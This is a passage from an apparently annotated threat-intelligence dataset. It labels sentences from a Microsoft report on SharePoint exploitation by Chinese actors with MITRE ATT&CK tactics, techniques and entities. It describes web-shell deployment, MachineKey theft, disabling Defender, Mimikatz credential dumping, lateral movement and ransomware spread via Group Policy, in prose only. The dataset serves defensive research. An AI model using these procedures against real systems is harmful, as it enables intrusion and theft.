"tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s184-69856a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 184, "context_before": "Disclaimer\nThe information in this report is being provided “as is” for informational purposes only.", "sentence_text": "Version History\nDecember 2024: Updates noted throughout.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p11-s186-2bc711", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 11, "sentence_id": 186, "context_before": "Dec. 1, 2023: Initial version.", "sentence_text": "Page 11 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s1-8e8c43", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Disrupting active exploitation of on-premises SharePoint vulnerabilities | Microsoft Security Blog Skip to main content Share Link copied to clipboard!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s2-4f6aab", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Disrupting active exploitation of on-premises SharePoint vulnerabilities | Microsoft Security Blog Skip to main content Share Link copied to clipboard!", "sentence_text": "Content types\nResearch\nProducts and services Topics Threat intelligence July 23, 2025 update – Expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603 leading to the deployment of Warlock ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "deploy Warlock ransomware after exploitation", "entities": [ { "text": "Storm-2603", "start": 195, "end": 205, "label": "ThreatActor" }, { "text": "Warlock ransomware", "start": 235, "end": 253, "label": "MalwareTool" }, { "text": "exploitation activity", "start": 170, "end": 191, "label": "Action" }, { "text": "deployment", "start": 221, "end": 231, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s3-f61d27", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Content types\nResearch\nProducts and services Topics Threat intelligence July 23, 2025 update – Expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603 leading to the deployment of Warlock ransomware.", "sentence_text": "On July 19, 2025, Microsoft Security Response Center (MSRC)\npublished a blog addressing active attacks against on-premises SharePoint servers that exploit CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit SharePoint CVEs for spoofing and RCE", "entities": [ { "text": "SharePoint servers", "start": 123, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "published", "start": 60, "end": 69, "label": "Action" }, { "text": "addressing active attacks", "start": 77, "end": 102, "label": "Action" }, { "text": "exploit", "start": 147, "end": 154, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s4-eeeaf2", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "On July 19, 2025, Microsoft Security Response Center (MSRC)\npublished a blog addressing active attacks against on-premises SharePoint servers that exploit CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability.", "sentence_text": "These vulnerabilities affect on-premises SharePoint servers only and do not affect SharePoint Online in Microsoft 365.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s5-a484b3", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "These vulnerabilities affect on-premises SharePoint servers only and do not affect SharePoint Online in Microsoft 365.", "sentence_text": "Customers should apply these updates immediately to ensure they are protected.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s6-f412a0", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "Customers should apply these updates immediately to ensure they are protected.", "sentence_text": "These comprehensive security updates address newly disclosed security vulnerabilities in CVE-2025-53770 that are related to the previously disclosed vulnerability CVE-2025-49704.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "security updates", "start": 20, "end": 36, "label": "Action" }, { "text": "address", "start": 37, "end": 44, "label": "Action" }, { "text": "CVE-2025-53770", "start": 89, "end": 103, "label": "Infrastructure_Indicator" }, { "text": "CVE-2025-49704", "start": 163, "end": 177, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s7-47816f", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "These comprehensive security updates address newly disclosed security vulnerabilities in CVE-2025-53770 that are related to the previously disclosed vulnerability CVE-2025-49704.", "sentence_text": "As of this writing, Microsoft has observed two named Chinese nation-state actors, Linen Typhoon and Violet Typhoon exploiting these vulnerabilities targeting internet-facing SharePoint servers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit SharePoint vulnerabilities", "entities": [ { "text": "Linen Typhoon", "start": 82, "end": 95, "label": "ThreatActor" }, { "text": "Violet Typhoon", "start": 100, "end": 114, "label": "ThreatActor" }, { "text": "SharePoint servers", "start": 174, "end": 192, "label": "Infrastructure_Indicator" }, { "text": "exploiting", "start": 115, "end": 125, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s8-6b96f7", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "As of this writing, Microsoft has observed two named Chinese nation-state actors, Linen Typhoon and Violet Typhoon exploiting these vulnerabilities targeting internet-facing SharePoint servers.", "sentence_text": "In addition, we have observed another China-based threat actor, tracked as Storm-2603, exploiting these vulnerabilities to deploy ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "exploiting vulnerabilities to deploy ransomware", "entities": [ { "text": "China-based threat actor", "start": 38, "end": 62, "label": "ThreatActor" }, { "text": "Storm-2603", "start": 75, "end": 85, "label": "ThreatActor" }, { "text": "ransomware", "start": 130, "end": 140, "label": "MalwareTool" }, { "text": "exploiting", "start": 87, "end": 97, "label": "Action" }, { "text": "deploy", "start": 123, "end": 129, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s9-764e25", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "In addition, we have observed another China-based threat actor, tracked as Storm-2603, exploiting these vulnerabilities to deploy ransomware.", "sentence_text": "Investigations into other actors also using these exploits are still ongoing.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "other actors", "start": 20, "end": 32, "label": "ThreatActor" }, { "text": "using these exploits", "start": 38, "end": 58, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s10-fe1020", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "Investigations into other actors also using these exploits are still ongoing.", "sentence_text": "With the rapid adoption of these exploits, Microsoft assesses with high confidence that threat actors will continue to integrate them into their attacks against unpatched on-premises SharePoint systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "threat actors", "start": 88, "end": 101, "label": "ThreatActor" }, { "text": "SharePoint systems", "start": 183, "end": 201, "label": "Infrastructure_Indicator" }, { "text": "integrate", "start": 119, "end": 128, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s11-02cf1e", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "With the rapid adoption of these exploits, Microsoft assesses with high confidence that threat actors will continue to integrate them into their attacks against unpatched on-premises SharePoint systems.", "sentence_text": "This blog shares details of observed exploitation of CVE-2025-49706 and CVE-2025-49704 and the follow-on tactics, techniques, and procedures (TTPs) by threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s12-d73a44", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "This blog shares details of observed exploitation of CVE-2025-49706 and CVE-2025-49704 and the follow-on tactics, techniques, and procedures (TTPs) by threat actors.", "sentence_text": "We will update this blog with more information as our investigation continues.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s13-954aae", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "We will update this blog with more information as our investigation continues.", "sentence_text": "as detailed in Mitigations section below .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s14-b81a34", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "as detailed in Mitigations section below .", "sentence_text": "Customers should also rotate SharePoint server ASP.NET machine keys, restart Internet Information Services (IIS), and deploy Microsoft Defender for Endpoint or equivalent solutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s15-9adff7", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Customers should also rotate SharePoint server ASP.NET machine keys, restart Internet Information Services (IIS), and deploy Microsoft Defender for Endpoint or equivalent solutions.", "sentence_text": "Observed tactics and techniques Post-exploitation activities Threat actors who successfully executed the authentication bypass and remote code execution exploits against vulnerable on-premises SharePoint servers have been observed using a web shell in their post-exploitation payload.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "deploy web shell after SharePoint exploitation", "entities": [ { "text": "Threat actors", "start": 61, "end": 74, "label": "ThreatActor" }, { "text": "web shell", "start": 239, "end": 248, "label": "MalwareTool" }, { "text": "SharePoint servers", "start": 193, "end": 211, "label": "Infrastructure_Indicator" }, { "text": "executed the authentication bypass", "start": 92, "end": 126, "label": "Action" }, { "text": "remote code execution", "start": 131, "end": 152, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s16-b61653", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "Observed tactics and techniques Post-exploitation activities Threat actors who successfully executed the authentication bypass and remote code execution exploits against vulnerable on-premises SharePoint servers have been observed using a web shell in their post-exploitation payload.", "sentence_text": "Web shell deployment In observed attacks, threat actors send a crafted POST request to the SharePoint server, uploading a malicious script named spinstall0.aspx.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "upload spinstall0.aspx web shell via POST request", "entities": [ { "text": "threat actors", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": "spinstall0.aspx", "start": 145, "end": 160, "label": "MalwareTool" }, { "text": "SharePoint server", "start": 91, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "uploading", "start": 110, "end": 119, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s17-47106e", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Web shell deployment In observed attacks, threat actors send a crafted POST request to the SharePoint server, uploading a malicious script named spinstall0.aspx.", "sentence_text": "Actors have also modified the file name in a variety of ways, such as spinstall.aspx , spinstall1.aspx , spinstall2.aspx, etc.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "use variant filenames for web shell", "entities": [ { "text": "Actors", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "spinstall.aspx", "start": 70, "end": 84, "label": "MalwareTool" }, { "text": "spinstall1.aspx", "start": 87, "end": 102, "label": "MalwareTool" }, { "text": "spinstall2.aspx", "start": 105, "end": 120, "label": "MalwareTool" }, { "text": "modified", "start": 17, "end": 25, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s18-b53a81", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Actors have also modified the file name in a variety of ways, such as spinstall.aspx , spinstall1.aspx , spinstall2.aspx, etc.", "sentence_text": "The spinstall0.aspx script contains commands to retrieve MachineKey data and return the results to the user through a GET request, enabling the theft of the key material by threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "retrieves MachineKey data and returns it via GET request to enable theft of key material", "entities": [ { "text": "threat actors", "start": 173, "end": 186, "label": "ThreatActor" }, { "text": "spinstall0.aspx", "start": 4, "end": 19, "label": "MalwareTool" }, { "text": "MachineKey data", "start": 57, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "retrieve", "start": 48, "end": 56, "label": "Action" }, { "text": "theft", "start": 144, "end": 149, "label": "Action" }, { "text": "GET request", "start": 118, "end": 129, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s19-504c3f", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "The spinstall0.aspx script contains commands to retrieve MachineKey data and return the results to the user through a GET request, enabling the theft of the key material by threat actors.", "sentence_text": "Related IOCs and hunting queries Indicators of compromise section of this blog.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s20-e59e3c", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "Related IOCs and hunting queries Indicators of compromise section of this blog.", "sentence_text": "Attribution\nAs early as July 7, 2025, Microsoft analysis suggests threat actors were attempting to exploit CVE-2025-49706 and CVE-2025-49704 to gain initial access to target organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit CVEs for initial access", "entities": [ { "text": "threat actors", "start": 66, "end": 79, "label": "ThreatActor" }, { "text": "exploit", "start": 99, "end": 106, "label": "Action" }, { "text": "gain initial access", "start": 144, "end": 163, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s21-edfa16", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Attribution\nAs early as July 7, 2025, Microsoft analysis suggests threat actors were attempting to exploit CVE-2025-49706 and CVE-2025-49704 to gain initial access to target organizations.", "sentence_text": "These actors include Chinese state actors Linen Typhoon and Violet Typhoon and another China-based actor Storm-2603.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "Linen Typhoon", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": "Violet Typhoon", "start": 60, "end": 74, "label": "ThreatActor" }, { "text": "Storm-2603", "start": 105, "end": 115, "label": "ThreatActor" } ] }, { "uid": "mitre-92_mitre_report-p1-s22-09c686", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "These actors include Chinese state actors Linen Typhoon and Violet Typhoon and another China-based actor Storm-2603.", "sentence_text": "The TTPs employed in these exploit attacks align with previously observed activities of these threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s23-5f6b5f", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "The TTPs employed in these exploit attacks align with previously observed activities of these threat actors.", "sentence_text": "This threat actor is known for using drive-by compromises and historically has relied on existing exploits to compromise organizations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "use drive-by compromises and existing exploits", "entities": [ { "text": "threat actor", "start": 5, "end": 17, "label": "ThreatActor" }, { "text": "drive-by compromises", "start": 37, "end": 57, "label": "Action" }, { "text": "relied on existing exploits", "start": 79, "end": 106, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s24-d83ae4", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "This threat actor is known for using drive-by compromises and historically has relied on existing exploits to compromise organizations.", "sentence_text": "This group persistently scans for vulnerabilities in the exposed web infrastructure of target organizations, exploiting discovered weaknesses to install web shells.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595.002", "name": "Vulnerability Scanning" } ], "procedure": "scan for vulnerabilities and install web shells", "entities": [ { "text": "group", "start": 5, "end": 10, "label": "ThreatActor" }, { "text": "web shells", "start": 153, "end": 163, "label": "MalwareTool" }, { "text": "scans", "start": 24, "end": 29, "label": "Action" }, { "text": "exploiting", "start": 109, "end": 119, "label": "Action" }, { "text": "install", "start": 145, "end": 152, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s25-ccbe0e", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "This group persistently scans for vulnerabilities in the exposed web infrastructure of target organizations, exploiting discovered weaknesses to install web shells.", "sentence_text": "Storm-2603\nThe group that Microsoft tracks as Storm-2603 is assessed with moderate confidence to be a China-based threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s26-220265", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Storm-2603\nThe group that Microsoft tracks as Storm-2603 is assessed with moderate confidence to be a China-based threat actor.", "sentence_text": "Although Microsoft has observed this threat actor deploying Warlock and Lockbit ransomware in the past, Microsoft is currently unable to confidently assess the threat actor’s objectives.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "deploy Warlock and Lockbit ransomware", "entities": [ { "text": "threat actor", "start": 37, "end": 49, "label": "ThreatActor" }, { "text": "Warlock", "start": 60, "end": 67, "label": "MalwareTool" }, { "text": "Lockbit ransomware", "start": 72, "end": 90, "label": "MalwareTool" }, { "text": "deploying", "start": 50, "end": 59, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s27-6d06d1", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "Although Microsoft has observed this threat actor deploying Warlock and Lockbit ransomware in the past, Microsoft is currently unable to confidently assess the threat actor’s objectives.", "sentence_text": "Initial access and delivery The observed attack begins with the exploitation of an internet-facing on-premises SharePoint server, granting Storm-2603 initial access to the environment using the spinstall0.aspx payload described earlier in this blog.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit SharePoint server for initial access", "entities": [ { "text": "Storm-2603", "start": 139, "end": 149, "label": "ThreatActor" }, { "text": "spinstall0.aspx", "start": 194, "end": 209, "label": "MalwareTool" }, { "text": "SharePoint server", "start": 111, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "exploitation", "start": 64, "end": 76, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s28-2574c3", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "Initial access and delivery The observed attack begins with the exploitation of an internet-facing on-premises SharePoint server, granting Storm-2603 initial access to the environment using the spinstall0.aspx payload described earlier in this blog.", "sentence_text": "This initial access is used to conduct command execution using the w3wp.exe process that supports SharePoint.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "execute commands via w3wp.exe process", "entities": [ { "text": "w3wp.exe process", "start": 67, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "command execution", "start": 39, "end": 56, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s29-a5ee9a", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "This initial access is used to conduct command execution using the w3wp.exe process that supports SharePoint.", "sentence_text": "Storm-2603 then initiates a series of discovery commands, including whoami , to enumerate user context and validate privilege levels.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1033", "name": "System Owner/User Discovery" } ], "procedure": "run discovery commands like whoami", "entities": [ { "text": "Storm-2603", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "enumerate user context", "start": 80, "end": 102, "label": "Action" }, { "text": "validate privilege levels", "start": 107, "end": 132, "label": "Action" }, { "text": "whoami", "start": 68, "end": 74, "label": "MalwareTool" } ] }, { "uid": "mitre-92_mitre_report-p1-s30-004df1", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "Storm-2603 then initiates a series of discovery commands, including whoami , to enumerate user context and validate privilege levels.", "sentence_text": "The use of cmd.exe and batch scripts is also observed as the actor transitions into broader execution phases.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "use cmd.exe and batch scripts for execution", "entities": [ { "text": "batch scripts", "start": 23, "end": 36, "label": "MalwareTool" }, { "text": "cmd.exe", "start": 11, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "use", "start": 4, "end": 7, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s31-a8d8a8", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "The use of cmd.exe and batch scripts is also observed as the actor transitions into broader execution phases.", "sentence_text": "Notably, services.exe is abused to disable Microsoft Defender protections through direct registry modifications.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "abuse services.exe to disable Defender via registry", "entities": [ { "text": "services.exe", "start": 9, "end": 21, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Defender", "start": 43, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "disable", "start": 35, "end": 42, "label": "Action" }, { "text": "abused", "start": 25, "end": 31, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s32-292d1e", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Notably, services.exe is abused to disable Microsoft Defender protections through direct registry modifications.", "sentence_text": "Persistence\nStorm-2603 established persistence through multiple mechanisms.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "establish persistence via multiple mechanisms", "entities": [ { "text": "Storm-2603", "start": 12, "end": 22, "label": "ThreatActor" }, { "text": "established persistence", "start": 23, "end": 46, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s33-41401c", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "Persistence\nStorm-2603 established persistence through multiple mechanisms.", "sentence_text": "In addition to the spinstall0.aspx web shell, the threat actor also creates scheduled tasks and manipulates Internet Information Services (IIS) components to load suspicious .NET assemblies.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.004", "name": "IIS Components" } ], "procedure": "create scheduled tasks and manipulate IIS for persistence", "entities": [ { "text": "threat actor", "start": 50, "end": 62, "label": "ThreatActor" }, { "text": "spinstall0.aspx", "start": 19, "end": 34, "label": "MalwareTool" }, { "text": "Internet Information Services (IIS)", "start": 108, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "creates scheduled tasks", "start": 68, "end": 91, "label": "Action" }, { "text": "manipulates", "start": 96, "end": 107, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s34-d5f48a", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "In addition to the spinstall0.aspx web shell, the threat actor also creates scheduled tasks and manipulates Internet Information Services (IIS) components to load suspicious .NET assemblies.", "sentence_text": "These actions ensure continued access even if initial vectors are remediated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s35-f92e4d", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "These actions ensure continued access even if initial vectors are remediated.", "sentence_text": "Action on objectives The threat actor performs credential access using Mimikatz, specifically targeting the Local Security Authority Subsystem Service (LSASS) memory to extract plaintext credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.001", "name": "OS Credential Dumping: LSASS Memory" } ], "procedure": "Use Mimikatz to access LSASS memory and extract plaintext credentials.", "entities": [ { "text": "Mimikatz", "start": 71, "end": 79, "label": "MalwareTool" }, { "text": "performs credential access", "start": 38, "end": 64, "label": "Action" }, { "text": "targeting the Local Security Authority Subsystem Service (LSASS) memory", "start": 94, "end": 165, "label": "Action" }, { "text": "LSASS", "start": 152, "end": 157, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-92_mitre_report-p1-s36-baf76a", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "Action on objectives The threat actor performs credential access using Mimikatz, specifically targeting the Local Security Authority Subsystem Service (LSASS) memory to extract plaintext credentials.", "sentence_text": "The actor moves laterally using PsExec and the Impacket toolkit, executing commands using Windows Management Instrumentation (WMI).", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "move laterally via PsExec, Impacket, and WMI", "entities": [ { "text": "actor", "start": 4, "end": 9, "label": "ThreatActor" }, { "text": "PsExec", "start": 32, "end": 38, "label": "MalwareTool" }, { "text": "Impacket toolkit", "start": 47, "end": 63, "label": "MalwareTool" }, { "text": "Windows Management Instrumentation (WMI)", "start": 90, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "moves laterally", "start": 10, "end": 25, "label": "Action" }, { "text": "executing commands", "start": 65, "end": 83, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s37-ca0b2d", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "The actor moves laterally using PsExec and the Impacket toolkit, executing commands using Windows Management Instrumentation (WMI).", "sentence_text": "Storm-2603 is then observed modifying Group Policy Objects (GPO) to distribute Warlock ransomware in compromised environments.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1484.001", "name": "Group Policy Modification" } ], "procedure": "modify GPO to distribute Warlock ransomware", "entities": [ { "text": "Storm-2603", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "Warlock ransomware", "start": 79, "end": 97, "label": "MalwareTool" }, { "text": "Group Policy Objects (GPO)", "start": 38, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "modifying", "start": 28, "end": 37, "label": "Action" }, { "text": "distribute", "start": 68, "end": 78, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s38-d6327d", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "Storm-2603 is then observed modifying Group Policy Objects (GPO) to distribute Warlock ransomware in compromised environments.", "sentence_text": "Additional actors will continue to use these exploits to target unpatched on-premises SharePoint systems, further emphasizing the need for organizations to implement mitigations and security updates immediately.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "additional actors will continue to use exploits to target unpatched on-premises SharePoint systems", "entities": [ { "text": "actors", "start": 11, "end": 17, "label": "ThreatActor" }, { "text": "SharePoint systems", "start": 86, "end": 104, "label": "Infrastructure_Indicator" }, { "text": "use these exploits", "start": 35, "end": 53, "label": "Action" }, { "text": "unpatched on-premises", "start": 64, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "implement mitigations and security updates", "start": 156, "end": 198, "label": "Action" } ] }, { "uid": "mitre-92_mitre_report-p1-s39-0224cd", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "Additional actors will continue to use these exploits to target unpatched on-premises SharePoint systems, further emphasizing the need for organizations to implement mitigations and security updates immediately.", "sentence_text": "Customers should apply these updates immediately.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s40-aeaed6", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "Customers should apply these updates immediately.", "sentence_text": "Customers using SharePoint Server should follow the guidance below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-92_mitre_report-p1-s41-de67bb", "source": "mitre", "doc_id": "92_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "Customers using SharePoint Server should follow the guidance below.", "sentence_text": "Use or upgrade to supported versions of on-premises Microsoft SharePoint Server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null 